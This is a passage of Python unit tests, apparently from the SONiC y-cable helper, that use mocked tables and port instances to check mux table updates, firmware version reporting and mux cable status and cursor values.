test_db[asic_index], MUX_CABLE_STATIC_INFO_TABLE)
mux_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_INFO_TABLE)
port_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], "PORT_INFO_TABLE")
port_tbl[asic_index].get.return_value = (status, fvs)
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_transceiver_info_dict.return_value = {
'manufacturer': 'microsoft', 'model': 'simulated'}
sys.modules['builtins.getattr'] = MagicMock()
rc = check_identifier_presence_and_update_mux_table_entry(
state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, y_cable_presence)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('sonic_y_cable.y_cable_vendor_mapping.mapping.get', MagicMock(return_value={"simulated": "microsoft.y_cable_simulated"}))
def test_check_identifier_presence_and_update_mux_table_entry_module_microsoft_y_cable_presence_false(self):
asic_index = 0
logical_port_name = "Ethernet0"
status = True
fvs = [('state', "auto"), ('read_side', 1)]
state_db = {}
test_db = "TEST_DB"
y_cable_tbl = {}
static_tbl = {}
mux_tbl = {}
port_tbl = {}
y_cable_presence = [False]
port_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], "PORT_INFO_TABLE")
port_tbl[asic_index].get.return_value = (status, fvs)
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_transceiver_info_dict.return_value = {
'manufacturer': 'microsoft', 'model': 'simulated'}
sys.modules['builtins.getattr'] = MagicMock()
rc = check_identifier_presence_and_update_mux_table_entry(
state_db, port_tbl, y_cable_tbl, static_tbl, mux_tbl, asic_index, logical_port_name, y_cable_presence)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_check_identifier_presence_and_delete_mux_table_entry(self):
asic_index = 0
logical_port_name = "Ethernet0"
status = True
fvs = [('state', "auto"), ('read_side', 1)]
state_db = {}
test_db = "TEST_DB"
y_cable_tbl = {}
static_tbl = {}
mux_tbl = {}
port_tbl = {}
y_cable_presence = [True]
delete_change_event = [True]
port_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], "PORT_INFO_TABLE")
port_tbl[asic_index].get.return_value = (status, fvs)
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as port_instance:
rc = check_identifier_presence_and_delete_mux_table_entry(
state_db, port_tbl, asic_index, logical_port_name, y_cable_presence, delete_change_event)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_chassis')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('swsscommon.swsscommon.Table')
def test_init_ports_status_for_y_cable(self, platform_chassis, platform_sfp, mock_swsscommon_table):
platform_sfp = MagicMock()
platform_chassis = MagicMock()
mock_logical_port_name = [""]
def mock_get_asic_id(mock_logical_port_name):
return 0
y_cable_presence = [True]
mock_table = MagicMock()
mock_table.getKeys = MagicMock(return_value=['Ethernet0', 'Ethernet4'])
mock_swsscommon_table.return_value = mock_table
rc = init_ports_status_for_y_cable(platform_sfp, platform_chassis,
y_cable_presence, stop_event=threading.Event())
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('swsscommon.swsscommon.Table')
def test_change_ports_status_for_y_cable_change_event(self, mock_swsscommon_table):
mock_logical_port_name = [""]
def mock_get_asic_id(mock_logical_port_name):
return 0
y_cable_presence = [True]
logical_port_dict = {'Ethernet0': '1'}
mock_table = MagicMock()
mock_table.getKeys = MagicMock(return_value=['Ethernet0', 'Ethernet4'])
mock_table.get = MagicMock(
side_effect=[(True, (('index', 1), )), (True, (('index', 2), ))])
mock_swsscommon_table.return_value = mock_table
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
change_ports_status_for_y_cable_change_event(
logical_port_dict, y_cable_presence, stop_event=threading.Event())
mock_swsscommon_table.assert_called()
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('swsscommon.swsscommon.Table')
def test_change_ports_status_for_y_cable_change_event_sfp_removed(self, mock_swsscommon_table):
mock_logical_port_name = [""]
def mock_get_asic_id(mock_logical_port_name):
return 0
y_cable_presence = [True]
logical_port_dict = {'Ethernet0': '1'}
mock_table = MagicMock()
mock_table.getKeys = MagicMock(return_value=['Ethernet0', 'Ethernet4'])
mock_table.get = MagicMock(
side_effect=[(True, (('index', 1), )), (True, (('index', 2), ))])
mock_swsscommon_table.return_value = mock_table
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
change_ports_status_for_y_cable_change_event(
logical_port_dict, y_cable_presence, stop_event=threading.Event())
mock_swsscommon_table.assert_called()
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('swsscommon.swsscommon.Table')
def test_change_ports_status_for_y_cable_change_event_sfp_unknown(self, mock_swsscommon_table):
mock_logical_port_name = [""]
def mock_get_asic_id(mock_logical_port_name):
return 0
y_cable_presence = [True]
logical_port_dict = {'Ethernet0': '2'}
mock_table = MagicMock()
mock_table.getKeys = MagicMock(return_value=['Ethernet0', 'Ethernet4'])
mock_table.get = MagicMock(
side_effect=[(True, (('index', 1), )), (True, (('index', 2), ))])
mock_swsscommon_table.return_value = mock_table
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
change_ports_status_for_y_cable_change_event(
logical_port_dict, y_cable_presence, stop_event=threading.Event())
mock_swsscommon_table.assert_called()
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
def test_delete_ports_status_for_y_cable(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_table.getKeys = MagicMock(return_value=['Ethernet0', 'Ethernet4'])
mock_table.get = MagicMock(
side_effect=[(True, (('index', 1), )), (True, (('index', 2), ))])
mock_swsscommon_table.return_value = mock_table
mock_logical_port_name = [""]
def mock_get_asic_id(mock_logical_port_name):
return 0
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.logical.return_value = ['Ethernet0', 'Ethernet4']
patched_util.get_asic_id_for_logical_port.return_value = 0
rc = delete_ports_status_for_y_cable()
mock_swsscommon_table.assert_called()
def test_check_identifier_presence_and_update_mux_info_entry(self):
asic_index = 0
logical_port_name = "Ethernet0"
state_db = {}
test_db = "TEST_DB"
mux_tbl = {}
mux_tbl[asic_index] = swsscommon.Table(
test_db[asic_index], MUX_CABLE_INFO_TABLE)
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.logical.return_value = ['Ethernet0', 'Ethernet4']
rc = check_identifier_presence_and_update_mux_info_entry(
state_db, mux_tbl, asic_index, logical_port_name)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
def test_get_firmware_dict(self, port_instance):
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.download_firmware_status = 1
physical_port = 1
target = "simulated_target"
side = "a"
mux_info_dict = {}
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
status = True
fvs = [('state', "auto"), ('read_side', 1)]
Table = MagicMock()
Table.get.return_value = (status, fvs)
rc = get_firmware_dict(
physical_port, port_instance, target, side, mux_info_dict, logical_port_name)
assert(mux_info_dict['version_a_active'] == None)
assert(mux_info_dict['version_a_inactive'] == None)
assert(mux_info_dict['version_a_next'] == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
def test_get_firmware_dict_asic_error(self, port_instance):
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
port_instance.download_firmware_status = 1
physical_port = 1
target = "simulated_target"
side = "a"
mux_info_dict = {}
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
status = True
fvs = [('state', "auto"), ('read_side', 1)]
Table = MagicMock()
Table.get.return_value = (status, fvs)
swsscommon.Table.return_value.get.return_value = (
False, {"read_side": "2"})
rc = get_firmware_dict(
physical_port, port_instance, target, side, mux_info_dict, logical_port_name)
assert(mux_info_dict['version_a_active'] == "N/A")
assert(mux_info_dict['version_a_inactive'] == "N/A")
assert(mux_info_dict['version_a_next'] == "N/A")
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
def test_get_firmware_dict_download_status_failed_exception(self, port_instance):
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_FAILED = -1
port_instance.download_firmware_status = -1
port_instance.get_firmware_version = MagicMock(
side_effect=NotImplementedError)
physical_port = 1
target = "simulated_target"
side = "a"
mux_info_dict = {}
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
status = True
fvs = [('state', "auto"), ('read_side', 1)]
Table = MagicMock()
Table.get.return_value = (status, fvs)
rc = get_firmware_dict(
physical_port, port_instance, target, side, mux_info_dict, logical_port_name)
assert(mux_info_dict['version_a_active'] == "N/A")
assert(mux_info_dict['version_a_inactive'] == "N/A")
assert(mux_info_dict['version_a_next'] == "N/A")
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
def test_get_firmware_dict_download_status_failed(self, port_instance):
port_instance = MagicMock()
port_instance.FIRMWARE_DOWNLOAD_STATUS_FAILED = -1
port_instance.download_firmware_status = -1
port_instance.get_firmware_version = MagicMock(
return_value={"version_active": "2021", "version_inactive": "2020", "version_next": "2022"})
physical_port = 1
target = "simulated_target"
side = "a"
mux_info_dict = {}
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
status = True
fvs = [('state', "auto"), ('read_side', 1)]
Table = MagicMock()
Table.get.return_value = (status, fvs)
rc = get_firmware_dict(
physical_port, port_instance, target, side, mux_info_dict, logical_port_name)
assert(mux_info_dict['version_a_active'] == "2021")
assert(mux_info_dict['version_a_inactive'] == "2020")
assert(mux_info_dict['version_a_next'] == "2022")
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
def test_get_muxcable_info(self, platform_sfputil):
physical_port = 20
logical_port_name = "Ethernet20"
swsscommon.Table.return_value.get.return_value = (
True, {"read_side": "1"})
platform_sfputil.get_asic_id_for_logical_port = 0
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
self.TARGET_NIC = 1
self.TARGET_TOR_A = 1
self.TARGET_TOR_B = 1
self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
self.download_firmware_status = 0
self.SWITCH_COUNT_MANUAL = "manual"
self.SWITCH_COUNT_AUTO = "auto"
def get_active_linked_tor_side(self):
return 1
def get_mux_direction(self):
return 1
def get_switch_count_total(self, switch_count):
return 1
def get_eye_heights(self, tgt_tor):
return 500
def is_link_active(self, tgt_nic):
return True
def get_local_temperature(self):
return 22.75
def get_local_voltage(self):
return 0.5
def get_nic_voltage(self):
return 2.7
def get_nic_temperature(self):
return 20
patched_util.get.return_value = PortInstanceHelper()
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
rc = get_muxcable_info(physical_port, logical_port_name)
assert(rc['tor_active'] == 'active')
assert(rc['mux_direction'] == 'self')
assert(rc['internal_voltage'] == 0.5)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
def test_get_muxcable_info_peer_side(self, platform_sfputil):
physical_port = 20
logical_port_name = "Ethernet20"
platform_sfputil.get_asic_id_for_logical_port = 0
swsscommon.Table.return_value.get.return_value = (
True, {"read_side": "2"})
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
self.TARGET_NIC = 1
self.TARGET_TOR_A = 1
self.TARGET_TOR_B = 1
self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
self.download_firmware_status = 0
self.SWITCH_COUNT_MANUAL = "manual"
self.SWITCH_COUNT_AUTO = "auto"
def get_active_linked_tor_side(self):
return 1
def get_mux_direction(self):
return 1
def get_switch_count_total(self, switch_count):
return 1
def get_eye_heights(self, tgt_tor):
return 500
def is_link_active(self, tgt_nic):
return True
def get_local_temperature(self):
return 22.75
def get_local_voltage(self):
return 0.5
def get_nic_voltage(self):
return 2.7
def get_nic_temperature(self):
return 20
patched_util.get.return_value = PortInstanceHelper()
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
rc = get_muxcable_info(physical_port, logical_port_name)
assert(rc['tor_active'] == 'standby')
assert(rc['mux_direction'] == 'peer')
assert(rc['internal_voltage'] == 0.5)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_get_muxcable_info_exceptions(self, platform_sfputil):
physical_port = 20
logical_port_name = "Ethernet20"
platform_sfputil.get_asic_id_for_logical_port = 0
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
self.TARGET_NIC = 1
self.TARGET_TOR_A = 1
self.TARGET_TOR_B = 1
self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
self.download_firmware_status = 0
self.SWITCH_COUNT_MANUAL = "manual"
self.SWITCH_COUNT_AUTO = "auto"
def get_active_linked_tor_side():
return 1
def get_mux_direction():
return 1
def get_switch_count_total(self, switch_count):
return 1
def get_eye_heights(tgt_tor):
return 500
def is_link_active(self, tgt_nic):
return True
def get_local_temperature():
return 22.75
def get_local_voltage():
return 0.5
def get_nic_voltage():
return 2.7
def get_nic_temperature():
return 20
patched_util.get.return_value = PortInstanceHelper()
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
rc = get_muxcable_info(physical_port, logical_port_name)
assert(rc['tor_active'] == 'unknown')
assert(rc['mux_direction'] == 'unknown')
assert(rc['self_eye_height_lane1'] == 'N/A')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_get_muxcable_info_true_exceptions_peer_side(self, platform_sfputil):
physical_port = 20
logical_port_name = "Ethernet20"
platform_sfputil.get_asic_id_for_logical_port = 0
swsscommon.Table.return_value.get.return_value = (
True, {"read_side": "2"})
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
self.TARGET_NIC = 1
self.TARGET_TOR_A = 1
self.TARGET_TOR_B = 1
self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
self.download_firmware_status = 0
self.SWITCH_COUNT_MANUAL = "manual"
self.SWITCH_COUNT_AUTO = "auto"
def get_active_linked_tor_side(self):
raise NotImplementedError
def get_mux_direction(self):
raise NotImplementedError
def get_switch_count_total(self, switch_count):
raise NotImplementedError
def get_eye_heights(self, tgt_tor):
raise NotImplementedError
def is_link_active(self, tgt_nic):
return False
def get_local_temperature(self):
raise NotImplementedError
def get_local_voltage(self):
raise NotImplementedError
def get_nic_voltage(self):
raise NotImplementedError
def get_nic_temperature(self):
raise NotImplementedError
patched_util.get.return_value = PortInstanceHelper()
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
rc = get_muxcable_info(physical_port, logical_port_name)
assert(rc['tor_active'] == 'unknown')
assert(rc['mux_direction'] == 'unknown')
assert(rc['self_eye_height_lane1'] == 'N/A')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_get_muxcable_info_true_exceptions(self, platform_sfputil):
physical_port = 20
logical_port_name = "Ethernet20"
platform_sfputil.get_asic_id_for_logical_port = 0
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
self.TARGET_NIC = 1
self.TARGET_TOR_A = 1
self.TARGET_TOR_B = 1
self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
self.download_firmware_status = 0
self.SWITCH_COUNT_MANUAL = "manual"
self.SWITCH_COUNT_AUTO = "auto"
def get_active_linked_tor_side(self):
raise NotImplementedError
def get_mux_direction(self):
raise NotImplementedError
def get_switch_count_total(self, switch_count):
raise NotImplementedError
def get_eye_heights(self, tgt_tor):
raise NotImplementedError
def is_link_active(self, tgt_nic):
return False
def get_local_temperature(self):
raise NotImplementedError
def get_local_voltage(self):
raise NotImplementedError
def get_nic_voltage(self):
raise NotImplementedError
def get_nic_temperature(self):
raise NotImplementedError
patched_util.get.return_value = PortInstanceHelper()
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
rc = get_muxcable_info(physical_port, logical_port_name)
assert(rc['tor_active'] == 'unknown')
assert(rc['mux_direction'] == 'unknown')
assert(rc['self_eye_height_lane1'] == 'N/A')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_get_muxcable_info_exceptions_peer_side(self, platform_sfputil):
physical_port = 20
logical_port_name = "Ethernet20"
platform_sfputil.get_asic_id_for_logical_port = 0
swsscommon.Table.return_value.get.return_value = (
True, {"read_side": "2"})
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
self.TARGET_NIC = 1
self.TARGET_TOR_A = 1
self.TARGET_TOR_B = 1
self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
self.FIRMWARE_DOWNLOAD_STATUS_FAILED = 2
self.download_firmware_status = 0
self.SWITCH_COUNT_MANUAL = "manual"
self.SWITCH_COUNT_AUTO = "auto"
def get_active_linked_tor_side():
return 1
def get_mux_direction():
return 1
def get_switch_count_total(self, switch_count):
return 1
def get_eye_heights(tgt_tor):
return 500
def is_link_active(self, tgt_nic):
return True
def get_local_temperature():
return 22.75
def get_local_voltage():
return 0.5
def get_nic_voltage():
return 2.7
def get_nic_temperature():
return 20
patched_util.get.return_value = PortInstanceHelper()
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
rc = get_muxcable_info(physical_port, logical_port_name)
assert(rc['tor_active'] == 'unknown')
assert(rc['mux_direction'] == 'unknown')
assert(rc['self_eye_height_lane1'] == 'N/A')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_get_muxcable_static_info(self, platform_sfputil):
physical_port = 0
logical_port_name = "Ethernet0"
platform_sfputil.get_asic_id_for_logical_port = 0
swsscommon.Table.return_value.get.return_value = (
True, {"read_side": "1"})
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
self.TARGET_NIC = 0
self.TARGET_TOR_A = 1
self.TARGET_TOR_B = 2
self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
self.download_firmware_status = 1
self.SWITCH_COUNT_MANUAL = "manual"
self.SWITCH_COUNT_AUTO = "auto"
def get_target_cursor_values(self, i, tgt):
if (tgt == self.TARGET_NIC):
return ([1, 7, 7, 1, 0])
elif (tgt == self.TARGET_TOR_A):
return ([17, 17, 17, 17, 17])
elif (tgt == self.TARGET_TOR_B):
return ([-17, -17, -17, -17, -17])
patched_util.get.return_value = PortInstanceHelper()
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
rc = get_muxcable_static_info(physical_port, logical_port_name)
assert (rc['read_side'] == 'tor1')
assert (rc['nic_lane1_precursor1'] == 1)
assert (rc['nic_lane1_precursor2'] == 7)
assert (rc['nic_lane1_maincursor'] == 7)
assert (rc['nic_lane1_postcursor1'] == 1)
assert (rc['nic_lane1_postcursor2'] == 0)
assert (rc['nic_lane2_precursor1'] == 1)
assert (rc['nic_lane2_precursor2'] == 7)
assert (rc['nic_lane2_maincursor'] == 7)
assert (rc['nic_lane2_postcursor1'] == 1)
assert (rc['nic_lane2_postcursor2'] == 0)
assert (rc['tor_self_lane1_precursor1'] == 17)
assert (rc['tor_self_lane1_precursor2'] == 17)
assert (rc['tor_self_lane1_maincursor'] == 17)
assert (rc['tor_self_lane1_postcursor1'] == 17)
assert (rc['tor_self_lane1_postcursor2'] == 17)
assert (rc['tor_self_lane2_precursor1'] == 17)
assert (rc['tor_self_lane2_precursor2'] == 17)
assert (rc['tor_self_lane2_maincursor'] == 17)
assert (rc['tor_self_lane2_postcursor1'] == 17)
assert (rc['tor_self_lane2_postcursor2'] == 17)
assert (rc['tor_peer_lane1_precursor1'] == -17)
assert (rc['tor_peer_lane1_precursor2'] == -17)
assert (rc['tor_peer_lane1_maincursor'] == -17)
assert (rc['tor_peer_lane1_postcursor1'] == -17)
assert (rc['tor_peer_lane1_postcursor2'] == -17)
assert (rc['tor_peer_lane2_precursor1'] == -17)
assert (rc['tor_peer_lane2_precursor2'] == -17)
assert (rc['tor_peer_lane2_maincursor'] == -17)
assert (rc['tor_peer_lane2_postcursor1'] == -17)
assert (rc['tor_peer_lane2_postcursor2'] == -17)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_get_muxcable_static_info_read_side_peer(self, platform_sfputil):
physical_port = 0
logical_port_name = "Ethernet0"
#swsscommon.Table = MagicMock()
# this patch is already done as global instance
platform_sfputil.get_asic_id_for_logical_port = 0
swsscommon.Table.return_value.get.return_value = (
True, {"read_side": "2"})
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
self.TARGET_NIC = 0
self.TARGET_TOR_A = 1
self.TARGET_TOR_B = 2
self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
self.download_firmware_status = 1
self.SWITCH_COUNT_MANUAL = "manual"
self.SWITCH_COUNT_AUTO = "auto"
def get_target_cursor_values(self, i, tgt):
if (tgt == self.TARGET_NIC):
return ([1, 7, 7, 1, 0])
elif (tgt == self.TARGET_TOR_A):
return ([-17, -17, -17, -17, -17])
elif (tgt == self.TARGET_TOR_B):
return ([-17, -17, -17, -17, -17])
patched_util.get.return_value = PortInstanceHelper()
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
rc = get_muxcable_static_info(physical_port, logical_port_name)
assert (rc['read_side'] == 'tor2')
assert (rc['nic_lane1_precursor1'] == 1)
assert (rc['nic_lane1_precursor2'] == 7)
assert (rc['nic_lane1_maincursor'] == 7)
assert (rc['nic_lane1_postcursor1'] == 1)
assert (rc['nic_lane1_postcursor2'] == 0)
assert (rc['nic_lane2_precursor1'] == 1)
assert (rc['nic_lane2_precursor2'] == 7)
assert (rc['nic_lane2_maincursor'] == 7)
assert (rc['nic_lane2_postcursor1'] == 1)
assert (rc['nic_lane2_postcursor2'] == 0)
assert (rc['tor_self_lane1_precursor1'] == -17)
assert (rc['tor_self_lane1_precursor2'] == -17)
assert (rc['tor_self_lane1_maincursor'] == -17)
assert (rc['tor_self_lane1_postcursor1'] == -17)
assert (rc['tor_self_lane1_postcursor2'] == -17)
assert (rc['tor_self_lane2_precursor1'] == -17)
assert (rc['tor_self_lane2_precursor2'] == -17)
assert (rc['tor_self_lane2_maincursor'] == -17)
assert (rc['tor_self_lane2_postcursor1'] == -17)
assert (rc['tor_self_lane2_postcursor2'] == -17)
assert (rc['tor_peer_lane1_precursor1'] == -17)
assert (rc['tor_peer_lane1_precursor2'] == -17)
assert (rc['tor_peer_lane1_maincursor'] == -17)
assert (rc['tor_peer_lane1_postcursor1'] == -17)
assert (rc['tor_peer_lane1_postcursor2'] == -17)
assert (rc['tor_peer_lane2_precursor1'] == -17)
assert (rc['tor_peer_lane2_precursor2'] == -17)
assert (rc['tor_peer_lane2_maincursor'] == -17)
assert (rc['tor_peer_lane2_postcursor1'] == -17)
assert (rc['tor_peer_lane2_postcursor2'] == -17)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_get_muxcable_static_info_read_side_peer_exceptions(self, platform_sfputil):
physical_port = 0
logical_port_name = "Ethernet0"
#swsscommon.Table = MagicMock()
# this patch is already done as global instance
platform_sfputil.get_asic_id_for_logical_port = 0
swsscommon.Table.return_value.get.return_value = (
True, {"read_side": "2"})
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
class PortInstanceHelper():
def __init__(self):
self.EEPROM_ERROR = -1
self.TARGET_NIC = 0
self.TARGET_TOR_A = 1
self.TARGET_TOR_B = 2
self.FIRMWARE_DOWNLOAD_STATUS_INPROGRESS = 1
self.download_firmware_status = 1
self.SWITCH_COUNT_MANUAL = "manual"
self.SWITCH_COUNT_AUTO = "auto"
def get_target_cursor_values(self, i, tgt):
raise NotImplementedError
patched_util.get.return_value = PortInstanceHelper()
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
patched_util.get_asic_id_for_logical_port.return_value = 0
rc = get_muxcable_static_info(physical_port, logical_port_name)
assert (rc['read_side'] == 'tor2')
assert (rc['nic_lane1_precursor1'] == "N/A")
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
def test_task_download_firmware_worker(self, port_instance, mock_swsscommon_table):
port = "Ethernet0"
physical_port = 0
file_full_path = "/path/to/file"
def mock_download_fw(filepath):
return 0
port_instance.download_firmware = mock_download_fw
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
rc = {}
task_download_firmware_worker(port, physical_port, port_instance, file_full_path,
xcvrd_down_fw_rsp_tbl, xcvrd_down_fw_cmd_sts_tbl, rc)
assert(rc[0] == 0)
def test_set_show_firmware_fields(self):
mux_info_dict = {}
xcvrd_show_fw_res_tbl = Table("STATE_DB", "XCVRD_SHOW_FW_RES")
mux_info_dict['version_self_active'] = '0.8'
mux_info_dict['version_self_inactive'] = '0.7'
mux_info_dict['version_self_next'] = '0.7'
mux_info_dict['version_peer_active'] = '0.8'
mux_info_dict['version_peer_inactive'] = '0.7'
mux_info_dict['version_peer_next'] = '0.7'
mux_info_dict['version_nic_active'] = '0.8'
mux_info_dict['version_nic_inactive'] = '0.7'
mux_info_dict['version_nic_next'] = '0.7'
rc = set_show_firmware_fields(
